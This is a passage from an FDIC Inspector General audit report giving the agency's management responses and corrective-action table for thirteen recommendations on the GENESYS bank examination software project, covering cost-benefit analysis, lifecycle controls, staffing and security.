this overall\nproblem. These include: more complete and robust IT plans for all projects; new management\nreporting; new guidelines for cost benefit analysis; post implementation reviews; and internal\ncontrols which tie to the steps in the SDLC.\n\nCurrently, each project that exceeds $200,000 has an IT Plan established at its inception along\nwith the appointment of a project owner from the requesting division or office. New information\nis now being captured in the IT Plan including early warning, overall project issues, budget\nissues, project justification, milestones, budget, and expenditures. This information is being used\nto produce a new management report highlighting budget variances, project slippage, and project\nrisks such as poor customer participation, project scope creep, technical challenges, staffing\nissues, contractor performance/management. Strict adherence is placed on cost and schedule.\nExpenditures for these projects are automatically updated via a direct tie to the DIRM budget\nsystem and requests to change completion dates for major project milestones require Branch\nChief approval or higher for key projects. In addition, during the annual budget formulation\nprocess, the funding and justification of the project is reviewed by the requesting division\xe2\x80\x99s line\n\n                                                         28\n\x0c                                                                                     APPENDIX I\n\nmanagement, the IT Technical Committee, and the IT Council. Procedures have been\nestablished to insure that any significant changes in major projects are brought before the IT\nTechnical Committee for review and approval.\n\nNew procedures for conducting a cost benefit analysis, based on OMB and DOF guidelines, have\nbeen published and are being used on projects such as ETVS and CHRIS. These procedures will\nbe formally published with the next release of the Systems Development Life Cycle Manual\nSDLC. DIRM is now conducting post implementation reviews, which include a level of review\nto assess a project at the time of design, as well as looking at a project after its implementation.\n\nAlso, our new internal controls are now tied to the specific SDLC processes to ensure that we are\nadhering to our development methodology. Following approval of the new management control\nplan for systems development, a copy will be provided to the OIG.\n\nFor recommendations 1-4 DIRM will reemphasize specific requirements and responsibilities to\nall project managers by March 31, 1999. This will be accomplished through the issuance of a\nmemorandum from the Director of DIRM to all project managers clearly communicating the\npolicies referenced in this response. For recommendations 5-8, DIRM will review and\nstrengthen its SDLC, which it plans to revise by April 30, 1999, with later revisions as required.\nDIRM has previously complied with Recommendation 9, which entails obtaining Board of\nDirector approval for significant investments in non-FDIC GENESYS requirements. No\nadditional investments of this type are planned in 1999 or 2000. DOS has already started to\nestablish permanent core staff to manage major systems development efforts as suggested in\nrecommendations 10 and 11. Recommendations 12 and 13 entail the strengthening of\nGENESYS security, which is planned for future releases.\n\nDIRM and DOS believe that the above actions will address the overall recommendations included in\nthis report. The following outlines the corrective actions already taken or planned (including\nanticipated due dates) in response to each individual recommendation.\n\nRecommendation 1 (DIRM)\n\n       Formally evaluate and document the feasibility and cost-benefit of alternative solutions\n       for systems development projects, including major enhancements to GENESYS, using\n       the guidelines in the FDIC\'s SDLC Manual before committing significant life cycle\n       resources to a particular alternative.\n\nCorrective Action\n\n       The SDLC currently requires a project budget package, including a formal evaluation of\n       alternatives, be prepared for all corporate projects expected to exceed the IT Dollar\n       threshold. This threshold, currently set at $3 million, and a new formal CBA format now\n       exist but were not in place when GENESYS was initiated. These new guidelines and IT\n\n\n\n\n                                                29\n\x0c                                                                                   APPENDIX I\n\n      dollar threshold, which are consistent with the DOF Directive on Cost Benefit Analysis\n      Methodology for the Purchase or Development of Capital Assets (Circular 4310.1), have\n      been used for recent projects, such as: the Structure Information Management System;\n      Electronic Travel Voucher Processing System (ETVPS); and other non-application\n      projects. Also, IT Plans are required for all projects exceeding $200,000 and, for any of\n      these projects that are new, a cost justification must be developed which includes the full\n      life cycle costs and benefits for the proposed alternative. These procedures and the IT\n      Dollar thresholds will be formally published with the next release of the SDLC, which\n      will clearly state the requirement for performing CBA\xe2\x80\x99s. DIRM, with the IT Committee,\n      will, by April 30, 1999, also review the current dollar threshold to determine whether it\n      warrants adjustment. As an interim measure, the new guidelines and IT dollar threshold\n      will be reemphasized and formally communicated to all project managers by March 31,\n      1999.\n\n      DIRM will reinforce its efforts to review project progress with clients, ensuring their\n      clear understanding and obtaining their approval of both original cost-benefit analyses,\n      and changes that modify the results of those analyses. DIRM also will present the initial\n      CBA and any updates for projects over $3 M to the IT Technical Committee. The IT\n      Technical Committee will report any project issues to the IT Council.\n\nRecommendation 2 (DIRM)\n\n      Revisit alternative solutions when significant scope, cost, risk, or schedule changes\n      occur on future information technology projects.\n\nCorrective Action\n\n      DIRM agrees that alternative solutions should be revisited when significant scope, cost,\n      risk, or schedule changes occur on information technology projects. Alternative solutions\n      will be revisited when CBAs are revised, which will occur when significant scope, cost,\n      risk, or schedule changes occur on projects over the $3m threshold. Significant scope\n      and risk determinations will be made by management from DIRM and the sponsoring\n      FDIC division(s). Significant costs will be defined as projected over-runs of 20% or\n      more, and significant schedule slips will defined as greater than 60 days. These\n      procedures and the IT Dollar thresholds will be formally published with the next release\n      of the SDLC, which will clearly state the requirement for performing CBA\xe2\x80\x99s. As an\n      interim measure, the new guidelines and IT dollar threshold will be reemphasized and\n      formally communicated to all project managers by March 31, 1999.\n\nRecommendation 3 (DIRM)\n\n      Revise the FDIC\'s SDLC Manual to require that as significant changes occur in a\n      project\'s scope, risk, estimated resources, or timeframes, that these changes be\n      approved by the IT Council.\n\n\n\n                                              30\n\x0c                                                                                    APPENDIX I\n\nCorrective Action\n\n      Alerting senior management to significant deviations in cost-benefit information, timelines,\n      or increased risk is now required of all DIRM project managers. Corrective actions already\n      have been taken to ensure that such do not reoccur. IT plans, required for all projects\n      exceeding $200,000 in expenditures, have warning flags automatically set to alert senior\n      management when completion dates for major project milestones are slipping (Refer to\n      Attachment 2). These flags are reviewed monthly and project managers are required to\n      report to DIRM senior management to explain the issues and obstacles causing the warning\n      flags. Changes to schedules and projected cost expenditures are tightly controlled. A Branch\n      Chief must approve changes to schedules on all projects. The expenditures are automatically\n      updated, and therefore controlled via the budget system. These requirements will be\n      formally reemphasized and communicated to all project managers by March 31, 1999.\n\n      The IT Council provides the approval authority for the initiation of IT systems development\n      projects. It is the responsibility of project managers and, if appropriate, Steering\n      Committees, to ensure projects are reviewed and reevaluated at critical management\n      checkpoints during the life cycle of the systems development effort. In addition, schedule\n      slippage of more than 60 days or projected cost overruns of more than 20 percent for any\n      major project will be presented to the IT Technical Committee for management action. The\n      IT Committee will report these project issues to the IT Council. DIRM will arrange, by\n      March 31, 1999, for the OIG to meet with the IT Committee to discuss the OIG proposal to\n      change the charters of the IT Committee or IT Council to approve such deviations to project\n      schedules or costs.\n\nRecommendation 4 (DIRM)\n\n      Require the GENESYS development team to follow the phased development process\n      prescribed by the FDIC\'s SDLC Manual for systems development projects, including\n      any major enhancements to GENESYS.\n\nCorrective Action\n\n      All DIRM project managers are responsible for ensuring that prerequisite SDLC phases are\n      substantially complete and approved prior to proceeding with subsequent SDLC phases.\n      This process is in place but was not regularly adhered to during the initial GENESYS\n      systems development effort. Corrective actions have been taken to address these problems.\n      The current GENESYS version 1.2 project is being closely monitored by management to\n      ensure compliance with SDLC procedures.\n\n      The requirement to ensure that prerequisite SDLC phases are substantially complete and\n      approved prior to proceeding with subsequent SDLC phases will be highlighted in the next\n      SDLC revision. This requirement will be formally reemphasized and communicated to all\n      project managers by March 31, 1999.\n\n\n\n                                              31\n\x0c                                                                                     APPENDIX I\n\n      DIRM project managers may continue to propose different approaches to phased\n      development than dictated in the SDLC as justified by business needs and circumstances.\n      Any proposals to utilize significantly different approaches to phased development will be\n      considered on a case-by-case basis, and approved or denied in writing by senior DIRM\n      management after a review of the probable risks and benefits of the proposed approach.\n\nRecommendation 5 (DIRM)\n\n      Determine whether evolutionary prototyping could benefit FDIC\'s small, non-complex\n      systems initiatives that involve short development schedules. If DIRM determines that\n      evolutionary prototyping is appropriate for select, small scale IT initiatives, then the\n      FDIC\'s SDLC Manual should be amended to describe the type of methodology that will\n      be used and specific criteria governing its use.\n\nCorrective Action\n\n      The current FDIC SDLC methodology allows the use of prototyping in the Requirements\n      Definition Phase to elicit customer feedback on screen layouts and basic system features.\n      The prototype is developed and reviewed in an iterative process that continues until the\n      customer is satisfied with the basic features and screen designs, which are then documented\n      in the Functional Requirements Document. This prototyping methodology is often described\n      as throwaway prototyping.\n\n      The GENESYS project made extensive use of this technique during the Requirements\n      Definition Phase, building a prototype, however, that was not thrown away, but retained and\n      ultimately adopted as the starting point for development of the fully featured and completely\n      functional final system. As modules of GENESYS were completed in the Development\n      Phase, screens and functionality were reviewed with examiners to confirm that the\n      requirements and design had been effectively translated into working software. Often\n      changes were requested by the examiners and then incorporated into the software. This\n      iterative process, which lasted throughout the development phase and into the testing phase,\n      can be viewed as a form of evolutionary prototyping.\n\n      DIRM will make an assessment of whether the evolutionary prototyping methodology could\n      benefit FDIC\'s small, non-complex systems initiatives that involve short development\n      schedules. If DIRM determines that evolutionary prototyping is appropriate for select, small\n      scale IT initiatives, then the FDIC\'s SDLC Manual will be amended to describe the type of\n      methodology that will be used and specific criteria governing its use. The initial assessment\n      of the evolutionary prototyping methodology will be completed by June 30, 1999. A\n      schedule for updating the SDLC Manual will be developed after the assessment is complete,\n      but no later than July 30, 1999.\n\n\n\n\n                                               32\n\x0c                                                                                         APPENDIX I\n\n      DIRM continues to retain the latitude to incorporate additional systems development\n      practices into projects as required to supplement its standard SDLC methodology. If\n      significant variations or supplements to the SDLC are contemplated for a project, the project\n      managers are required to include them in their Project Work Plan deliverable, which is\n      subject to management review and approval. Techniques such as Joint Application Design\n      and Staged Delivery have been effectively incorporated into projects even though they are\n      not explicitly referenced in the SDLC. DIRM believes that the ability to continue to utilize\n      common software development methods in selected projects is a productive management\n      practice.\n\nRecommendation 6 (DIRM)\n\n      Follow the phased testing approach prescribed by the FDIC\'s SDLC Manual for all\n      future systems development projects and enhancements to existing systems.\n\nCorrective Action\n\n      DIRM agrees that a phased approach to comprehensive system testing, including unit and\n      integration testing, system qualification testing and user acceptance testing, should and will\n      be followed for all major system development and enhancement efforts, as prescribed by the\n      SDLC. Pilot testing may be included or not, for a given project, based on the judgement of\n      the project team and the desires, goals and objectives of the sponsoring agencies\xe2\x80\x99\n      management.\n\n      All development and enhancement projects will conduct appropriate testing, including unit\n      and integration testing, system qualification testing and user acceptance testing, per the\n      SDLC. Also per the SDLC, the project and program managers will exercise judgement in\n      determining the length, intensity, number and location of participants, and other relevant\n      testing factors for each test phase to conduct an overall testing activity that is appropriate in\n      scale and duration to the system or modification being tested.\n\nRecommendation 7 (DIRM/DOS)\n\n      Formally document and obtain interagency approval of the scope, tasks, schedule, and\n      resources associated with any major enhancement to GENESYS.\n\nCorrective Action\n\n      An interagency steering committee that will oversee development and enhancement of\n      interagency bank examination tools, including GENESYS, has been formed. This\n      committee includes management representatives from the FDIC, the Federal Reserve System\n      and the Conference of State Bank Supervisors, which represents the state regulators. This\n      committee provides high level direction for and oversight of the development and\n      enhancement of interagency bank examination tools. All such development or enhancement\n\n\n\n                                                 33\n\x0c                                                                                       APPENDIX I\n\n      cycles will begin with a planning phase, to include a detailed interagency project plan as a\n      deliverable; this project plan will include cycle scope, tasks, schedule and resource estimates,\n      and will be presented to the members of this committee for formal approval.\n\nRecommendation 8 (DIRM/DOS)\n\n      Obtain formal, interagency approval of all SDLC deliverable products required by the\n      FDIC\'s SDLC process for major planned GENESYS enhancements.\n\nCorrective Action\n\n      As indicated in the response to Recommendation 7 above, an interagency steering committee\n      has been formed to oversee development and enhancement of interagency bank examination\n      tools, including GENESYS. All SDLC deliverable products required for any major\n      GENESYS enhancement will require formal approval from this interagency committee.\n\nRecommendation 9 (DIRM/DOS)\n\n      Obtain FDIC Board of Director approval prior to investing significant FDIC resources\n      to satisfy non-FDIC requirements on GENESYS.\n\nCorrective Action\n\n      The FDIC Board of Directors did approve a total of $7.3 million dollars for the development\n      and support of GENESYS and related examination software through the year 2000 as part of\n      a July 1997 Board Case to acquire contractor services for DOS information systems projects.\n      Included within this Board Case was a GENESYS Project Work Plan, which noted that as a\n      result of interagency discussion, FDIC would \xe2\x80\x9cassume the role of the primary development\n      agency, with the participation of FDIC, FRS, and CSBS supervisory staff as needed.\xe2\x80\x9d\n\n      DIRM annually presents a comprehensive budget request to the FDIC Board of Directors for\n      approval. Any significant resources required for non-FDIC GENESYS requirements,\n      beyond what has already been approved, will be explicitly identified and presented to the\n      Board of Directors for approval via the annual budget request for the year in which these\n      expenses are expected to be realized. Any significant resources required for non-FDIC\n      GENESYS requirements that were not approved via the annual budget request would also be\n      presented to the Board of Directors for approval.\n\n\n\n\n                                                34\n\x0c                                                                                        APPENDIX I\n\nRecommendation 10 (DOS)\n\n      Evaluate the feasibility of establishing a permanent staff to manage the development,\n      operation, and maintenance of major DOS systems including GENESYS.\n\nCorrective Action\n\n      DOS recognizes the need for a more permanent staff to oversee software development.\n      However, to ensure the software satisfies the needs of the field staff, it is necessary that field\n      staff be used as subject matter experts to oversee product development. Examination\n      standards and policies are constantly changing and permanent Washington staff soon lose the\n      knowledge necessary to be effective in examination software development. In an effort to\n      provide continuity to project management, DOS Washington Policy Section established an\n      Examination Specialist position to head software development; however, additional staffing\n      will continue to be provided by field staff on detail assignments. For current GENESYS\n      development, DOS has recruited three field examiners for one year details who will report\n      directly to the Program Manager. Additional staffing will be provided from short-term\n      details as needed. The Federal Reserve Board has also provided permanent staffing for\n      developmental needs.\n\nRecommendation 11 (DOS)\n\n      Ensure that a core group of staff is assigned to future systems development or\n      enhancement projects until the project is completed.\n\nCorrective Action\n\n      A problem that DOS faces regarding permanent staffing is recruiting field examiners to\n      volunteer for extended assignments. We agree it is difficult to maintain continuity for\n      application development when the subject matter experts are replaced every 120 days.\n      However, if the detail assignment extends beyond 120 days, the detailee must change\n      travel status to Category II as required by the General Travel Regulations. Examiners are\n      reluctant to volunteer for these extended details because of personal and financial\n      drawbacks of such assignments. Not only do the extended detail assignments to\n      Washington take detailees away from families, but the loss of potential income can be\n      significant. Additionally, examiners believe that long-term details can hurt career\n      advancement opportunities because of lost examination experience while on the extended\n      detail. However, as indicated above, we believe the steps already taken will provide the\n      necessary continuity for the project going forward.\n\n\n\n\n                                                 35\n\x0c                                                                                         APPENDIX I\n\nRecommendation 12 (DIRM)\n\n      Incorporate security features into GENESYS that will adequately address the security\n      requirements contained in the functional requirements document and that will provide\n      reasonable assurance that confidential bank examination information will be\n      adequately protected against unauthorized disclosure or alteration.\n\nCorrective Action\n\n      DIRM is committed to strengthening the security features contained within GENESYS to\n      protect sensitive and confidential data contained in the system database. As explained in the\n      audit report, the measures that are currently in place are interim measures that afforded some\n      degree of protection while more robust and permanent measures could be identified and\n      incorporated.\n\n      The GENESYS project team sought and acquired a waiver of the corporate policy requiring\n      Entrust in order to release GENESYS as developed. One of the conditions of that waiver\n      was conversion from the interim security solution to a more permanent solution during the\n      version 1.2 enhancement cycle. DIRM has initiated this enhancement cycle, and discussions\n      are in progress with the Federal Reserve and the Conference of State Bank Supervisors to\n      identify a security solution that will be acceptable to all parties. Once identified, this solution\n      will be incorporated into the product for implementation with the v1.2 release of the system.\n\n\nRecommendation 13 (DIRM)\n\n      Direct DIRM\'s Information Security Section to perform a security review of\n      GENESYS to ensure compliance with corporate security standards and guidelines and\n      to ensure that the application has adequate security.\n\nCorrective Action\n\n      DIRM proposes to address this recommendation in conjunction with the version 1.2\n      enhancement cycle for the GENESYS product. A security review of the current product will\n      likely find the same weaknesses that have been identified in this audit report and would\n      therefore be of little value. As noted in DIRM\xe2\x80\x99s response to Recommendation 12, DIRM has\n      already initiated the v1.2 enhancement cycle for the GENESYS product, and this cycle will\n      include action to strengthen the security components of the GENESYS product. DIRM has\n      appointed an Information Security Section staff member to the project team, and will\n      conduct appropriate reviews and other actions to ensure that the v1.2 release of GENESYS is\n      in full compliance with corporate security standards. DIRM proposes to deliver the v1.2\n      release of GENESYS during the fourth quarter of 1999.\n\n\n\n\n                                                 36\n\x0c                                                                                                                                                                            APPENDIX II\n                                                               MANAGEMENT RESPONSES TO RECOMMENDATIONS\n\n\n\nThe Inspector General Act of 1978, as amended, requires the OIG to report the status of management decisions on its recommendations in its semiannual reports to the Congress. To consider\nFDIC\xe2\x80\x99s responses as management decisions in accordance with the act and related guidance, several conditions are necessary. First, the response must describe for each recommendation\n\n    \xc2\xa7    the specific corrective actions already taken, if applicable;\n    \xc2\xa7    corrective actions to be taken together with the expected completion dates for their implementation; and\n    \xc2\xa7    documentation that will confirm completion of corrective actions.\n\nIf any recommendation identifies specific monetary benefits, FDIC management must state the amount agreed or disagreed with and the reasons for any disagreement. In the case of questioned\ncosts, the amount FDIC plans to disallow must be included in management\xe2\x80\x99s response.\n\nIf management does not agree that a recommendation should be implemented, it must describe why the recommendation is not considered valid. Second, the OIG must determine that\nmanagement\xe2\x80\x99s descriptions of (1) the course of action already taken or proposed and (2) the documentation confirming completion of corrective actions are responsive to its recommendations.\n\nThis table presents the management responses that have been made on recommendations in our report and the status of management decisions. The information for management decisions is based\non management\xe2\x80\x99s written response to our report and subsequent discussions with management representatives.\n\n\n\n\n                                                                                               37\n\x0c                                                                                                                                               APPENDIX II\n                                                       MANAGEMENT RESPONSES TO RECOMMENDATIONS\n\n\n\n                                                                                                 Documentation That                    Management\n Rec.                                                                            Expected           Will Confirm           Monetary   Decision: Yes or\nNumber           Corrective Action: Taken or Planned/Status                   Completion Date       Final Action           Benefits          No\n         The Corporation agreed with the recommendation. The IT\n         Technical Committee will review all 1999 IT development                                 March 24, 1999 DIRM\n         projects to determine which projects require a CBA by                                  memorandum to OIG and\n  1                                                                           March 31, 1999                                None            Yes\n                                                                                                 DIRM memorandum to\n         March 30, 1999. DIRM will issue a memorandum to its project                               project managers.\n         managers re-emphasizing SDLC policy regarding CBAs.\n         The Corporation agreed with the recommendation. DIRM will\n         issue a memorandum to its project managers reminding them to\n         alert senior management to significant changes in cost-benefit\n         information, timelines, or increased risk. The DIRM                                    DIRM memorandum to                          Yes\n  2                                                                           March 31, 1999                                None\n         memorandum will also communicate new policy requiring                                    project managers\n         project managers to formally revisit alternative solutions when\n         significant scope, cost, risk, or schedule changes occur on IT\n         projects.\n         The Corporation agreed with the recommendation. DIRM will\n         present significant scope, cost, risk, and schedule changes to the\n         IT Technical Committee for approval. The IT Technical\n         Committee will report this information to the IT Council. The                              Revision to the IT\n         IT Technical Committee will review any IT project that has                               Technical Committee\n         been flagged with variances in DIRM\'s IT Plan Database. After                          Charter or documentation\n  3      reviewing these projects, the IT Technical Committee will            March 24, 1999                                None            Yes\n                                                                                                  indicating that the IT\n         request briefings from the DIRM project manager and client                              Council is reviewing IT\n         sponsor on projects considered significant. If the impact of the                               projects.\n         variance warrants, the IT Technical Committee will recommend\n         IT Council review. Procedures for performing, updating, and\n         maintaining CBAs will be formally published in the next\n         release of FDIC\'s SDLC Manual.\n\n\n\n\n                                                                                    38\n\x0c                                                                                                                             APPENDIX II\n                                                  MANAGEMENT RESPONSES TO RECOMMENDATIONS\n\n    The Corporation agreed with the recommendation. DIRM will\n    issue a memorandum to all DIRM project managers re-\n    emphasizing existing requirements that prerequisite SDLC\n                                                                                           DIRM memorandum to\n4   phases be substantially completed and approved before               March 31, 1999                              None   Yes\n                                                                                             project managers.\n    proceeding with subsequent phases. This requirement will be\n    highlighted in the upcoming SDLC revision, currently planned\n    for April 30, 1999, with later revisions as required.\n    The Corporation agreed with the recommendation. DIRM will\n    make an assessment as to whether deviations from FDIC\'s SDLC\n    process, similar to the evolutionary prototyping methodology used                        DIRM assessment\n    to develop GENESYS, may benefit FDIC\'s small, non-complex                              document and specific\n5                                                                        July 30, 1999                              None   Yes\n    systems initiatives that involve short development schedules. An                       changes to the SDLC\n    initial assessment will be completed by June 30, 1999, with a                               Manual.\n    schedule for updating FDIC\'s SDLC Manual to be developed no\n    later than July 30, 1999.\n    The Corporation agreed with the recommendation. DIRM will\n    issue a memorandum reminding its project managers to adhere\n                                                                                           DIRM memorandum to\n6   to the phased testing approach prescribed by FDIC\'s SDLC            March 31, 1999                              None   Yes\n                                                                                             project managers.\n    Manual for all future systems development projects and\n    enhancements.\n    The Corporation agreed with the recommendation. An\n    interagency steering committee has been established to oversee\n                                                                                           DOS Regional Director\n    the development and enhancement of interagency bank\n                                                                                          Memorandum 98-097 and\n7   examination software, including GENESYS. The steering               October 6, 1998                             None   Yes\n                                                                                           approved project work\n    committee will formally approve an interagency project work\n                                                                                                   plan.\n    plan describing life cycle scope, tasks, schedule and resource\n    estimates for any major GENESYS enhancement.\n    The Corporation agreed with the recommendation. An\n    interagency steering committee has been established to oversee                         DOS Regional Director\n    the development and enhancement of interagency bank                                   Memorandum 98-097 and\n8                                                                       October 6, 1998                             None   Yes\n    examination software, including GENESYS. The steering                                     approved SDLC\n    committee will formally approve all SDLC deliverable products                           deliverable products.\n    required for any major GENESYS enhancement.\n    The Corporation agreed with the recommendation. DIRM and\n    DOS will explicitly identify and present any significant\n    resources for non-FDIC GENESYS requirements to the FDIC\n    Board of Directors as part of the annual budget process. Any                          DIRM and DOS budget\n9                                                                       March 15, 1999                              None   Yes\n    significant resources required for non-FDIC GENESYS                                      documentation.\n    requirements that were not approved as part of the annual\n    budget process will also be presented to the FDIC Board of\n    Directors for approval.\n\n\n                                                                              39\n\x0c                                                                                                                              APPENDIX II\n                                                 MANAGEMENT RESPONSES TO RECOMMENDATIONS\n\n\n\n     The Corporation agreed with the recommendation. A\n     permanent Examination Specialist position has been created to\n     manage DOS\' bank examination software development,                                    Approved organization\n10                                                                     January 4, 1999                               None   Yes\n     including GENESYS. In addition, 3 field examiners have been                                  chart\n     appointed to support the development of DOS\' bank\n     examination software for a period of one year.\n     The Corporation agreed with the recommendation. A\n     permanent Examination Specialist position has been created to\n     manage DOS\' bank examination software development,                                   Approved organizational\n11                                                                     January 4, 1999                               None   Yes\n     including GENESYS. In addition, 3 field examiners have been                                  chart\n     appointed to support the development of DOS\' bank\n     examination software for a period of one year.\n     The Corporation agreed with the recommendation. Discussions\n     are ongoing with representatives of the FRS and CSBS to\n                                                                                             GENESYS system\n12   identify a security solution for GENESYS. Once identified, the   December 31, 1999                              None   Yes\n                                                                                              documentation\n     solution will be incorporated into the system with the\n     implementation of GENESYS version 1.2.\n                                                                                           Document from DIRM\n     The Corporation agreed with the recommendation. DIRM\n                                                                                            Information Security\n     appointed an Information Security Section staff member to the\n                                                                                           Section indicating that\n13   GENESYS project who will be responsible for conducting           December 31, 1999                              None   Yes\n                                                                                          GENESYS complies with\n     appropriate reviews to ensure that GENESYS version 1.2 is in\n                                                                                              corporate security\n     full compliance with corporate security standards.\n                                                                                                  standards.\n\n\n\n\n                                                                             40\n\x0c'